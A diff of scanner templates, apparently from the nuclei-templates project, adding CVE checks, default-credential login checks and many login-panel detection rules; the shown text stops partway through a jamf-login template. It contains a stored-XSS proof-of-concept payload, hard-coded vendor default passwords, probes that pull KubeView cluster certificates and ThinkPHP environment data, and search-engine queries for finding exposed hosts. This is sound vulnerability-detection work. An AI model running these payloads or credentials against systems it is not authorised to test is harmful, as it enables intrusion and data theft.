condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200

2
cves/2022/CVE-2022-23131.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2022-23131
info:
name: Zabbix - SAML SSO Authentication Bypass
author: For3stCo1d
author: For3stCo1d,spac3wh1te
severity: critical
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
reference:

2
cves/2022/CVE-2022-25323.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-25323
info:
name: ZEROF Web Server 2.0 Cross-Site Scripting
name: ZEROF Web Server 2.0 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.

41
cves/2022/CVE-2022-25481.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2022-25481
info:
name: ThinkPHP 5.0.24 - Information Disclosure
author: caon
severity: high
description: |
ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php.
reference:
- https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25481
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-25481
cwe-id: CWE-668
metadata:
shodan-query: title:"ThinkPHP"
verified: "true"
tags: cve,cve2022,thinkphp,exposure,oss
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?s=example'
matchers-condition: and
matchers:
- type: word
words:
- "ThinkPHP"
- type: word
words:
- "HttpException"
- "TRACE"
condition: or
- type: status
status:
- 404

4
cves/2022/CVE-2022-3484.yaml
View File

@ -15,9 +15,9 @@ info:
cve-id: CVE-2022-3484
cwe-id: CWE-79
metadata:
verified: true
google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php
verified: "true"
tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress
tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core
requests:
- method: GET

64
cves/2022/CVE-2022-3506.yaml Normal file
View File

@ -0,0 +1,64 @@
id: CVE-2022-3506
info:
name: WordPress Related Posts <= 2.1.2 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability.
reference:
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828
- https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-3506
cwe-id: CWE-79
metadata:
verified: "true"
tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D
- |
GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(all_headers_4, 'text/html')"
- "status_code_4 == 200"
- 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")'
- "contains(body_4, 'The amount of automatically')"
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
internal: true

39
cves/2022/CVE-2022-45933.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-45933
info:
name: KubeView - Information disclosure
author: For3stCo1d
severity: critical
description: |
KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."
reference:
- https://github.com/benc-uk/kubeview/issues/95
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-45933
cwe-id: CWE-287
metadata:
shodan-query: http.title:"KubeView"
verified: "true"
tags: cve,cve2022,kubeview,kubernetes,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/scrape/kube-system"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'BEGIN CERTIFICATE'
- 'END CERTIFICATE'
- 'kubernetes.io'
condition: and
- type: status
status:
- 200

48
default-logins/nsicg/nsicg-default-login.yaml Normal file
View File

@ -0,0 +1,48 @@
id: nsicg-default-login
info:
name: Ns-icg Default Login
author: pikpikcu
severity: high
description: |
There is a weak password vulnerability in NetentSec Internet Control Gateway ns-icg of Beijing NetentScience and Technology Co., Ltd., which allows attackers to successfully log in to the system and obtain sensitive information by exploiting this loophole.
reference: |
- https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
metadata:
verified: true
fofa-query: "NS-ICG"
tags: nsicg,default-login
requests:
- raw:
- |
@timeout: 25s
POST /user/login/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
usrname={{username}}&pass={{password}}&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree=
- |
@timeout: 25s
GET /user/main HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/user/login/
attack: pitchfork
payloads:
username:
- ns25000
password:
- ns25000
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(all_headers_1, "/user/main/")'
- 'status_code_1 == 302'
- 'status_code_2 == 200'
- contains(body_2, "var loguser = \'ns25000")
condition: and

5
default-logins/others/kingsoft-v8-default-login.yaml
View File

@ -3,7 +3,7 @@ id: kingsoft-v8-default-login
info:
name: Kingsoft V8 Default Login
author: ritikchaddha
severity: medium
severity: high
reference:
- https://idc.wanyunshuju.com/aqld/2123.html
tags: kingsoft,default-login
@ -14,7 +14,7 @@ requests:
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: {{Hostname}}
{"get_user_login_cmd":{"name":"{{username}}","password":"{{md5("{{password}}")}}"}}
{"get_user_login_cmd":{"name":"{{username}}","password":"{{md5(password)}}"}}
attack: pitchfork
payloads:
@ -22,6 +22,7 @@ requests:
- admin
password:
- admin
host-redirects: true
max-redirects: 2
matchers-condition: and

57
default-logins/versa/versa-flexvnf-default-login.yaml Normal file
View File

@ -0,0 +1,57 @@
id: versa-flexvnf-default-login
info:
name: Versa FlexVNF Web-UI - Default Login
author: c-sh0
severity: high
reference:
- https://versa-networks.com/products/
metadata:
verified: true
shodan-query: title:"Flex VNF Web-UI"
tags: default-login,versa,flexvnf
requests:
- raw:
- |
GET /authenticate HTTP/1.1
Host: {{Hostname}}
- |
POST /authenticate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
CSRF-Token: {{xsrf_token}}
{"username":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
username:
- versa
- admin
password:
- versa123
- versa123
cookie-reuse: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{\"username\":\"{{username}}\",\"error\":false}"
- type: status
status:
- 200
extractors:
- type: regex
name: xsrf_token
group: 1
internal: true
part: header
regex:
- '(?i)Set-Cookie: XSRF-TOKEN=([A-Za-z0-9_.-]+)'

9
exposed-panels/apache-jmeter-dashboard.yaml
View File

@ -1,9 +1,14 @@
id: apache-jmeter-dashboard
info:
name: Apache JMeter Dashboard
name: Apache JMeter Dashboard Login Panel - Detect
author: tess
severity: low
description: Apache JMeter Dashboard login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Apache JMeter Dashboard"
@ -26,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/apache/public-tomcat-manager.yaml
View File

@ -1,11 +1,13 @@
id: public-tomcat-manager
info:
name: Apache Tomcat Manager Disclosure
name: Apache Tomcat Manager Login Panel - Detect
author: Ahmed Sherif,geeknik,sinKettu
severity: info
description: An Apache Tomcat Manager panel was discovered.
description: Apache Tomcat Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: title:"Apache Tomcat"
@ -20,6 +22,7 @@ requests:
matchers-condition: and
matchers:
- type: word
part: response
words:
- "Apache Tomcat"
- "Tomcat Manager"
@ -30,3 +33,5 @@ requests:
- 401
- 200
condition: or
# Enhanced by md on 2022/11/28

27
exposed-panels/asus-router-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: asus-router-panel
info:
name: Asus Router Login Panel
author: arafatansari
severity: info
metadata:
verified: true
shodan-query: 'Server: httpd/2.0 port:8080'
tags: panel,asus,router,iot
requests:
- method: GET
path:
- "{{BaseURL}}/Main_Login.asp"
matchers-condition: and
matchers:
- type: word
words:
- '<title>ASUS Login</title>'
- 'Sign in with your ASUS router account'
condition: or
- type: status
status:
- 200

25
exposed-panels/backpack/backpack-admin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: backpack-admin-panel
info:
name: Backpack Admin Login Panel
author: shine
severity: info
description: |
An Backpack Admin dashboard was detected.
metadata:
verified: true
shodan-query: title:"Backpack Admin"
tags: panel,backpack,admin
requests:
- method: GET
path:
- "{{BaseURL}}/admin/login"
matchers:
- type: word
part: body
words:
- 'Backpack Admin'
- 'backpack_alerts'
condition: or

40
exposed-panels/cisco/cisco-webvpn-detect.yaml Normal file
View File

@ -0,0 +1,40 @@
id: cisco-webvpn-detect
info:
name: Cisco WebVPN Detect
author: ricardomaia
severity: info
reference:
- https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/
metadata:
verified: true
fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg=="
google-query: intitle:"SSLVPN Service"
tags: panel,cisco,vpn
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/webvpn.html"
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CISCO"
- "AnyConnect"
- "SSLVPN Service"
condition: or
case-insensitive: true
- type: regex
part: header
regex:
- "webvpncontext=00@.+"
- "webvpn="
condition: or

27
exposed-panels/cudatel-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: cudatel-panel
info:
name: CudaTel Login Panel
author: arafatansari
severity: info
metadata:
verified: true
shodan-query: title:"CudaTel"
tags: panel,cudatel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- 'CudaTel Communications Server'
- 'alt="CudaTel'
condition: or
- type: status
status:
- 200

9
exposed-panels/dplus-dashboard.yaml
View File

@ -1,9 +1,14 @@
id: dplus-dashboard
info:
name: DPLUS Dashboard Exposure
name: DPLUS Dashboard Panel - Detect
author: tess
severity: info
description: DPLUS Dashboard panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"DPLUS Dashboard"
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

25
exposed-panels/dqs-superadmin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: dqs-superadmin-panel
info:
name: DQS Superadmin Login Panel
author: Hardik-Solanki
severity: info
metadata:
verified: true
shodan-query: title:"DQS Superadmin"
tags: panel,dqs,superadmin
requests:
- method: GET
path:
- '{{BaseURL}}/#/login'
matchers-condition: and
matchers:
- type: word
words:
- "DQS | Superadmin"
- type: status
status:
- 200

28
exposed-panels/dradis-pro-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: dradis-pro-panel
info:
name: Dradis Professional Edition Panel
author: righettod
severity: info
reference:
- https://dradisframework.com/ce/
metadata:
verified: true
shodan-query: title:"Dradis Professional Edition"
tags: panel,dradis
requests:
- method: GET
path:
- "{{BaseURL}}/pro/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Dradis Professional Edition"
- type: status
status:
- 200

42
exposed-panels/exolis-engage-panel.yaml Normal file
View File

@ -0,0 +1,42 @@
id: exolis-engage-panel
info:
name: Exolis Engage Panel - Detect
author: righettod
description: Exolis Engage panel was detected.
severity: info
reference:
- https://www.exolis.fr/en/solution-2/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"engage - Portail soignant"
google-dork: intitle:"engage - Portail soignant"
tags: panel,exolis,engage
requests:
- method: GET
path:
- "{{BaseURL}}/app.js"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "engage-specific-config"
- "engage-lastAppUserType"
- "engage-lastHelperPatientContext"
- "engage-preferred-language"
- "engageManager.admin"
- "engageManager.user"
condition: or
- type: status
status:
- 200
# Enhanced by md on 2022/11/29

9
exposed-panels/fastpanel-hosting-control-panel.yaml
View File

@ -1,9 +1,14 @@
id: fastpanel-hosting-control-panel
info:
name: Fastpanel Hosting Control Panel
name: FASTPANEL Login Panel - Detect
author: pikpikcu
severity: info
description: FASTPANEL login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"FASTPANEL HOSTING CONTROL"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

25
exposed-panels/flahscookie-superadmin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: flahscookie-superadmin-panel
info:
name: Flahscookie Superadmin Login
author: Hardik-Solanki
severity: info
metadata:
verified: true
shodan-query: title:"Flahscookie Superadmin"
tags: panel,flahscookie,superadmin
requests:
- method: GET
path:
- '{{BaseURL}}/pages/login'
matchers-condition: and
matchers:
- type: word
words:
- "Flahscookie Superadmin"
- type: status
status:
- 200

10
exposed-panels/ibm/ibm-security-access-manager.yaml
View File

@ -1,12 +1,16 @@
id: ibm-security-access-manager
info:
name: Detects IBM Security Access Manager
name: IBM Security Access Manager Login Panel - Detect
author: geeknik
severity: info
description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets.
description: IBM Security Access Manager login panel was detected.
reference:
- https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,ibm
requests:
@ -32,3 +36,5 @@ requests:
- "/mga/sps/authsvc/policy/forgot_password"
part: body
condition: and
# Enhanced by md on 2022/11/21

9
exposed-panels/ibm/ibm-service-assistant.yaml
View File

@ -1,9 +1,14 @@
id: ibm-service-assistant
info:
name: IBM Service Assistant
name: IBM Service Assistant Login Panel - Detect
author: dhiyaneshDK
severity: info
description: IBM Service Assistant login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Welcome to Service Assistant"
tags: panel,ibm,service
@ -22,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/ibm/ibm-websphere-admin-panel.yaml
View File

@ -1,11 +1,16 @@
id: ibm-websphere-admin-panel
info:
name: WebSphere Application Server Community Edition Admin Panel
name: IBM WebSphere Application Server Community Edition Admin Login Panel - Detect
author: ritikchaddha
severity: info
description: IBM WebSphere Application Server Community Edition admin login panel was detected.
reference:
- https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.favicon.hash:1337147129
@ -30,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

11
exposed-panels/ibm/ibm-websphere-panel.yaml
View File

@ -1,9 +1,14 @@
id: ibm-websphere-panel
info:
name: IBM WebSphere Panel
name: IBM WebSphere Portal Login Panel - Detect
author: pdteam
severity: info
description: IBM WebSphere Portal login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.html:"IBM WebSphere Portal"
tags: ibm,websphere,panel
@ -26,4 +31,6 @@ requests:
words:
- 'IBM WebSphere Portal'
- 'IBMPortalWeb'
condition: or
condition: or
# Enhanced by md on 2022/11/21

9
exposed-panels/icc-pro-login.yaml
View File

@ -1,11 +1,16 @@
id: icc-pro-login
info:
name: ICC Pro System Login
name: ICC PRO Login Panel - Detect
author: DhiyaneshDk
severity: info
description: ICC PRO login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/7980
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Login to ICC PRO system"
@ -31,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/icewarp-panel-detect.yaml
View File

@ -1,9 +1,14 @@
id: icewarp-panel-detect
info:
name: IceWarp Panel Detect
name: IceWarp Login Panel - Detect
author: ritikchaddha
severity: info
description: IceWarp login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"icewarp"
@ -32,3 +37,5 @@ requests:
group: 1
regex:
- 'Server: (.{4,20})'
# Enhanced by md on 2022/11/21

9
exposed-panels/icinga-web-login.yaml
View File

@ -1,9 +1,14 @@
id: icinga-web-login
info:
name: Icinga Web 2 Login
name: Icinga Web 2 Login Panel - Detect
author: dhiyaneshDK
severity: info
description: Icinga Web 2 login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Icinga Web 2 Login"
tags: panel,icinga
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/identity-services-engine.yaml
View File

@ -1,9 +1,14 @@
id: identity-services-engine
info:
name: Identity Services Engine
name: Cisco Identity Services Engine Admin Login Panel - Detect
author: dhiyaneshDK
severity: info
description: Cisco Identity Services Engine admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Identity Services Engine"
tags: panel
@ -19,3 +24,5 @@ requests:
- type: word
words:
- '<title>Identity Services Engine</title>'
# Enhanced by md on 2022/11/21

9
exposed-panels/ilch-admin-panel.yaml
View File

@ -1,9 +1,14 @@
id: ilch-admin-panel
info:
name: Ilch CMS Admin Panel
name: Ilch CMS Admin Login Panel - Detect
author: ritikchaddha
severity: info
description: Ilch CMS admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Ilch"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/incapptic-connect-panel.yaml
View File

@ -1,11 +1,16 @@
id: incapptic-connect-panel
info:
name: IVANTI Incapptic Connect
name: Ivanti Incapptic Connect Panel - Detect
author: righettod
severity: info
description: Ivanti Incapptic Connect panel was detected.
reference:
- https://www.ivanti.com/products/incapptic-connect
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query:
- http.title:"incapptic"
@ -34,3 +39,5 @@ requests:
- "status_code==200"
- "('-1067582922' == mmh3(base64_py(body)))"
condition: and
# Enhanced by md on 2022/11/21

4
technologies/influxdb-detect.yaml → exposed-panels/influxdb-panel.yaml
View File

@ -1,4 +1,4 @@
id: influxdb-detect
id: influxdb-panel
info:
name: InfluxDB Detect
@ -9,7 +9,7 @@ info:
- https://www.influxdata.com/
metadata:
shodan-query: http.title:"InfluxDB - Admin Interface"
tags: tech,influxdb
tags: panel,influxdb
requests:
- method: GET

9
exposed-panels/intelbras-login.yaml
View File

@ -1,11 +1,16 @@
id: intelbras-login
info:
name: Intelbras Login
name: Intelbras Router Login Panel - Detect
author: DhiyaneshDK
severity: info
description: Intelbras router logjn panel was detected.
reference:
- https://www.exploit-db.com/ghdb/7272
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Intelbras"
google-query: intitle:"Intelbras" "All Rights Reserved" -.com
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/intelbras-panel.yaml
View File

@ -1,9 +1,14 @@
id: intelbras-panel
info:
name: Intelbras Panel
name: Intelbras Router Panel - Detect
author: pikpikcu
severity: info
description: Intelbras router panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Intelbras"
@ -29,3 +34,5 @@ requests:
group: 1
regex:
- 'id="product">([A-Za-z 0-9]+)<\/p>'
# Enhanced by md on 2022/11/21

9
exposed-panels/intellian-aptus-panel.yaml
View File

@ -1,9 +1,14 @@
id: intellian-aptus-panel
info:
name: Intellian Aptus Web Login Panel
name: Intellian Aptus Web Login Panel - Detect
author: princechaddha
severity: info
description: Intelllian Aptus Web login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Intellian Aptus Web"
tags: panel,intellian,aptus
@ -31,3 +36,5 @@ requests:
group: 1
regex:
- "<title>Intellian Aptus Web (.*)</title>"
# Enhanced by md on 2022/11/21

9
exposed-panels/intelliflash-login-panel.yaml
View File

@ -1,9 +1,14 @@
id: intelliflash-login-panel
info:
name: IntelliFlash Login Panel Detect
name: IntelliFlash Login Panel - Detect
author: princechaddha
severity: info
description: IntelliFlash login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,intelliflash
requests:
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/iomega-emc-shared-nas.yaml
View File

@ -1,9 +1,14 @@
id: iomega-emc-shared-nas
info:
name: Iomega Lenovo EMC with shared NAS
name: Iomega LenovoEMC NAS Login Panel - Detect
author: e_schultze_
severity: info
description: Iomega LenovoEMC NAS login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel
requests:
@ -28,3 +33,5 @@ requests:
words:
- "iomega"
part: header
# Enhanced by md on 2022/11/21

9
exposed-panels/ipdiva-mediation-panel.yaml
View File

@ -1,9 +1,14 @@
id: ipdiva-mediation-panel
info:
name: IPdiva Mediation Panel Detect
name: IPdiva Mediation Login Panel - Detect
author: ritikchaddha
severity: info
description: IPdiva Mediation login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"IPdiva"
@ -30,3 +35,5 @@ requests:
part: body
words:
- "IPdiva Secure"
# Enhanced by md on 2022/11/21

9
exposed-panels/iptime-router.yaml
View File

@ -1,11 +1,16 @@
id: iptime-router
info:
name: ipTIME Router Login
name: ipTIME Router Login Panel - Detect
author: gy741
severity: info
description: ipTIME router login panel was detected.
reference:
- http://pierrekim.github.io/blog/2015-07-01-poc-with-RCE-against-127-iptime-router-models.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,login,iptime,router
requests:
@ -29,3 +34,5 @@ requests:
group: 1
regex:
- <TITLE>ipTIME ([A-Z0-9_-]+)<\/TITLE>
# Enhanced by md on 2022/11/21

9
exposed-panels/issabel-login.yaml
View File

@ -1,9 +1,14 @@
id: issabel-login
info:
name: Issabel Login Panel
name: Issabel Login Panel - Detect
author: pikpikcu
severity: info
description: Issabel login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
fofa-query: title="Issabel"
tags: issabel,panel
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/istat-panel-detect.yaml
View File

@ -1,9 +1,14 @@
id: istat-panel-detect
info:
name: i-STAT Panel Detect
name: Abbott i-STAT Login Panel - Detect
author: princechaddha
severity: info
description: Abbott i-STAT login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,abbott,istat
requests:
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21

12
exposed-panels/itop-panel.yaml
View File

@ -1,10 +1,14 @@
id: itop-panel
info:
name: iTop Instance Detection Template
name: Combodo iTop Login Panel - Detect
author: righettod
severity: info
description: Try to detect the presence of a Combodo iTop instance via the login page
description: Combodo iTop login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,itop
requests:
@ -24,4 +28,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by md on 2022/11/21

9
exposed-panels/ixbus/ixbusweb-version.yaml
View File

@ -1,9 +1,14 @@
id: ixbusweb-panel
info:
name: iXBusWeb Panel Detect
name: iXBus Login Panel - Detect
author: Podalirius
severity: info
description: iXBus login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"iXBus"
tags: panel,ixbusweb,cms
@ -29,3 +34,5 @@ requests:
group: 2
regex:
- '(iXBusWeb[\n\t ]+\((([0-9]+(.[0-9]+)?(.[0-9]+)?(.[0-9]+)?))\))'
# Enhanced by md on 2022/11/21

9
exposed-panels/ixcache-panel.yaml
View File

@ -1,11 +1,16 @@
id: ixcache-panel
info:
name: iXCache Panel Detect
name: iXCache Login Panel - Detect
author: ffffffff0x
severity: info
description: iXCache login panel was detected.
reference:
- https://www.panabit.com/cn/product/iXCache/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
fofa-query: app="iXCache"
tags: ixcache,panel
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 302
# Enhanced by md on 2022/11/21

9
exposed-panels/jamf-login.yaml
View File

@ -1,9 +1,14 @@
id: jamf-login
info:
